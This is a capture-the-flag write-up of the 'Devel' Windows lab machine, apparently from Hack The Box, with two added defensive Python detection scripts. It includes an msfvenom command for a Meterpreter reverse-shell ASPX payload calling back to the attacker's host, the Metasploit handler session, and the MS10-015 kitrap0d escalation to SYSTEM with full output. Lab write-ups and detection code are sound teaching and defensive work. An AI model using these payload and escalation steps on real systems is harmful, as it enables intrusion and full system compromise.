Devel

OS: Windows, Difficulty: Easy, IP: 10.10.10.5

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul  6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   237.33 ms 10.10.14.1
2   237.55 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds

We have anonymous FTP and a web server. It turns out the anonymous FTP root is the web server's document root, so a reverse ASPX shell uploaded via FTP is served (and executed) by IIS as soon as it is requested, which gives us a shell.
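From the defender's side, the misconfiguration above leaves a clear trace: an upload through the FTP service followed shortly by an HTTP request for the same path. The script below is an added example, not part of the original write-up, that correlates IIS FTP and HTTP W3C logs to flag server-executable files dropped via anonymous FTP. The log lines are constructed samples (field layout modelled on the IIS 7.5 defaults, but the parser takes column names from the #Fields directive, so other layouts work too); the correlation window and severity labels are my own choices.

```python
"""Correlate IIS FTP upload events with IIS HTTP requests to spot web shells
dropped through anonymous FTP into the web root (constructed sample logs)."""
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine or the CLR instead of serving as static content.
SERVER_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx", ".asa", ".config", ".dll", ".exe"}
# FTP commands that write data onto the server.
UPLOAD_COMMANDS = {"STOR", "STOU", "APPE"}

# Constructed sample FTP log (IIS FTP service, W3C format). Not real telemetry.
SAMPLE_FTP_LOG = """
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-07-06 10:37:58 10.10.14.7 - USER anonymous 331 0 0 1a2b /
2019-07-06 10:37:58 10.10.14.7 anonymous PASS *** 230 0 0 1a2b /
2019-07-06 10:38:05 10.10.14.7 anonymous STOR shell.aspx 226 0 0 1a2b /shell.aspx
2019-07-06 10:38:20 10.10.14.7 anonymous STOR notes.txt 226 0 0 1a2b /notes.txt
2019-07-06 10:39:01 10.10.14.7 anonymous STOR test.asp 550 0 0 1a2b /test.asp
2019-07-06 10:39:30 10.10.14.7 anonymous STOR x.ashx 226 0 0 1a2b /x.ashx
"""

# Constructed sample HTTP log (IIS web server, W3C format). Not real telemetry.
SAMPLE_HTTP_LOG = """
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-07-06 10:40:18 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.7 Mozilla/5.0 200 0 0 1200
2019-07-06 10:41:00 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 3
"""


def parse_w3c(text):
    """Parse an IIS W3C log into dicts; column names come from the #Fields directive."""
    fields, rows = [], []
    for line in text.strip().splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if len(values) != len(fields):
                continue  # truncated or malformed line: skip rather than guess
            rows.append(dict(zip(fields, values)))
    return rows


def _ts(row):
    return datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")


def _ext(path):
    dot = path.rfind(".")
    return path[dot:].lower() if dot >= 0 else ""


def find_webshell_drops(ftp_log, http_log, window=timedelta(minutes=10)):
    """Return alerts for successful anonymous uploads of server-executable files.

    Severity is 'medium' for the upload alone and 'high' when an HTTP request
    for the same path follows within `window` (FTP root == web root here)."""
    http_rows = parse_w3c(http_log)
    alerts = []
    for up in parse_w3c(ftp_log):
        if up["cs-method"] not in UPLOAD_COMMANDS or not up["sc-status"].startswith("2"):
            continue  # not an upload, or the transfer failed
        path = up.get("x-fullpath") or "/" + up["cs-uri-stem"].lstrip("/")
        if _ext(path) not in SERVER_EXECUTABLE:
            continue
        alert = {"path": path, "uploader": up["c-ip"], "user": up["cs-username"],
                 "uploaded": _ts(up), "severity": "medium", "first_request": None,
                 "requester": None}
        for req in http_rows:
            delta = (_ts(req) - _ts(up)).total_seconds()
            if req["cs-uri-stem"].lower() == path.lower() and 0 <= delta <= window.total_seconds():
                alert.update(severity="high", first_request=_ts(req), requester=req["c-ip"])
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_webshell_drops(SAMPLE_FTP_LOG, SAMPLE_HTTP_LOG):
        print(f"[{a['severity']}] {a['path']} uploaded by {a['user']}@{a['uploader']} "
              f"at {a['uploaded']}; first HTTP request: {a['first_request']} from {a['requester']}")
```

On the sample data the `.txt` upload and the failed `STOR test.asp` (status 550) are ignored, `x.ashx` is reported as medium because nothing requested it, and `shell.aspx` is escalated to high because the same client fetched it about two minutes after uploading it. The durable fix is of course to stop mapping a writable anonymous FTP root onto the web root at all; the correlation is for catching the case where someone already has.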

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f aspx > shell.aspx
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z

[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530

Now we run the local exploit suggester against the session and use the ms10_015_kitrap0d exploit it recommends.

meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.7       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

PLEASE NOTE

Before running the exploit/windows/local/ms10_015_kitrap0d module, make sure the LHOST and LPORT options are configured correctly: the module's defaults are not correct (here LPORT came up as 4444, not the 9999 the handler was using).

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
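The exploit output above shows the shape a detection can key on: a process launched to host the exploit (notepad, PID 2548) descending from the web server, followed by a command shell running as SYSTEM where the parent chain started under the IIS application pool identity. The script below is an added example, not part of the original write-up, that walks constructed Sysmon-style process-creation events, flags shell-like children of the IIS worker process (w3wp.exe is assumed to be the worker hosting the ASPX page) and notes where the account jumps to SYSTEM along the chain. The PIDs, images and user names in the sample are constructed.

```python
"""Flag command-shell style processes descending from the IIS worker process and
privilege jumps along that chain (constructed Sysmon-like ProcessCreate events)."""

WEB_WORKERS = {"w3wp.exe"}
# Children that an ASP.NET worker has no business spawning; csc.exe is deliberately
# absent because ASP.NET legitimately compiles pages with it.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "notepad.exe", "rundll32.exe",
                       "mshta.exe", "certutil.exe", "whoami.exe"}

# Constructed sample, modelled on Sysmon Event ID 1 fields. Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 600,  "image": "svchost.exe",  "ppid": 400,  "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 1200, "image": "w3wp.exe",     "ppid": 600,  "user": r"IIS APPPOOL\Web"},
    {"pid": 2548, "image": "notepad.exe",  "ppid": 1200, "user": r"IIS APPPOOL\Web"},
    {"pid": 2600, "image": "cmd.exe",      "ppid": 2548, "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 2700, "image": "whoami.exe",   "ppid": 2600, "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": 3000, "image": "w3wp.exe",     "ppid": 600,  "user": r"IIS APPPOOL\Web"},
    {"pid": 3100, "image": "csc.exe",      "ppid": 3000, "user": r"IIS APPPOOL\Web"},
    {"pid": 500,  "image": "explorer.exe", "ppid": 1,    "user": r"DEVEL\babis"},
    {"pid": 800,  "image": "notepad.exe",  "ppid": 500,  "user": r"DEVEL\babis"},
]


def ancestry(events_by_pid, pid):
    """Chain of events from `pid` upward until the parent is unknown (or a loop)."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)
        event = events_by_pid[pid]
        chain.append(event)
        pid = event["ppid"]
    return chain


def find_web_worker_abuse(events):
    """Return one alert per suspicious process that has a web worker among its ancestors."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        if event["image"].lower() not in SUSPICIOUS_CHILDREN:
            continue
        chain = ancestry(by_pid, event["pid"])
        workers = [a for a in chain[1:] if a["image"].lower() in WEB_WORKERS]
        if not workers:
            continue  # e.g. notepad started by a logged-on user's explorer.exe
        worker = workers[0]
        # A SYSTEM process hanging off an app-pool identity means a token was elevated somewhere.
        privilege_jump = (event["user"].upper() != worker["user"].upper()
                          and event["user"].upper().endswith("\\SYSTEM"))
        alerts.append({
            "pid": event["pid"],
            "image": event["image"],
            "chain": " -> ".join(a["image"] for a in reversed(chain)),
            "privilege_jump": privilege_jump,
        })
    return alerts


if __name__ == "__main__":
    for a in find_web_worker_abuse(SAMPLE_EVENTS):
        flag = " [PRIVILEGE JUMP]" if a["privilege_jump"] else ""
        print(f"pid {a['pid']} {a['image']}: {a['chain']}{flag}")
```

The ancestry walk matters more than the immediate parent: once the exploit payload lives in notepad, the later cmd.exe and whoami.exe are its grandchildren, and a rule that only looks at "w3wp.exe spawned X" would miss them. Keeping Windows 7 at the 6.1.7600 RTM level seen above is what makes MS10-015 usable at all; patching removes the privilege jump, the detection catches the initial foothold either way.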

User Own

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***

Learning Outcome

I was not aware of how to use Metasploit sessions, or that we can even use the local exploit suggester if we do not find any vulnerable information and the box is a little old. Additionally, sometimes the exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.
